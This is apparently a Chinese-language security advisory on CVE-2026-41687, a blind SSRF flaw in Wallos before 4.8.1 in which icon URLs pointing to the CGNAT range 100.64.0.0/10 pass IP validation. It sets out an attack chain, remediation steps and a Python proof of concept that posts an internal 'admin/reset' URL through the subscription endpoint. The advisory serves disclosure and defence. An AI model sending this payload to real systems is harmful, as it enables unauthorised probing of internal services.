IPBUF安全漏洞报告
English
CVE-2026-41687 CVSS 4.3 中危

CVE-2026-41687 Wallos SSRF漏洞(CGNAT绕过)

披露日期: 2026-05-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-41687
漏洞类型
SSRF (服务端请求伪造)
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Wallos

相关标签

SSRFWallosCGNAT内网扫描认证后攻击

漏洞概述

Wallos是一款开源的自托管个人订阅管理工具。在4.8.1版本之前,其订阅和支付端点在处理图标/Logo URL获取时存在服务端请求伪造(SSRF)漏洞。由于内联IP验证机制未正确过滤RFC 6598定义的CGNAT地址段(100.64.0.0/10),导致经过身份认证的攻击者可以利用该漏洞探测或攻击Tailscale、Carrier-Grade NAT等环境中的内部服务。该问题已在4.8.1版本中修复。

技术细节

该漏洞的根本原因在于Wallos在`endpoints/subscription/add.php`和`endpoints/payments/add.php`文件中使用了不完整的IP验证逻辑。代码中使用了PHP的`FILTER_FLAG_NO_PRIV_RANGE`和`FILTER_FLAG_NO_RES_RANGE`标志来防止访问内网地址,但这些标志默认不包含运营商级NAT(CGNAT)地址段`100.64.0.0/10`。尽管项目中包含`includes/ssrf_helper.php`文件,定义了`is_cgnat_ip()`函数用于检测此范围,但受影响的端点并未调用该辅助函数,而是直接执行了存在缺陷的内联验证。因此,拥有低权限的攻击者可以通过提交包含`100.64.x.x`地址的URL,诱使服务器向内部服务发起请求,从而实现盲SSRF攻击。

攻击链分析

STEP 1
1. 认证
攻击者注册并登录Wallos平台,获取有效的用户会话。
STEP 2
2. 构造恶意请求
攻击者在添加订阅或支付功能时,在Logo/图标URL字段中输入指向内部CGNAT地址(如100.64.x.x)的链接。
STEP 3
3. 绕过验证
服务器端接收请求,内联IP验证过滤器未能识别100.64.0.0/10为私有地址,验证通过。
STEP 4
4. 发起SSRF攻击
服务器端脚本尝试从攻击者提供的URL获取图标,向内部CGNAT服务发送HTTP请求。
STEP 5
5. 信息泄露
攻击者根据响应时间或回连确认内网服务状态,实现盲SSRF探测。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (example) target_url = "http://localhost/wallos/endpoints/subscription/add.php" # Attacker controlled payload targeting a CGNAT address (e.g., Tailscale) payload_url = "http://100.64.0.1/admin/reset" # Session cookie obtained after login cookies = { "PHPSESSID": "attacker_session_id" } # Data to send data = { "name": "Test Subscription", "icon_url": payload_url, # The vulnerable field "price": "10.00" } response = requests.post(target_url, data=data, cookies=cookies) if response.status_code == 200: print("Request sent successfully. Check internal logs for connection attempts.") else: print(f"Failed with status code: {response.status_code}")

影响范围

Wallos < 4.8.1

防御指南

临时缓解措施
建议立即更新到修复版本4.8.1。若无法立即升级,应通过防火墙或安全组阻断应用服务器对100.64.0.0/10网段的出站连接,或临时禁用订阅/支付添加功能中的图标URL获取特性。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表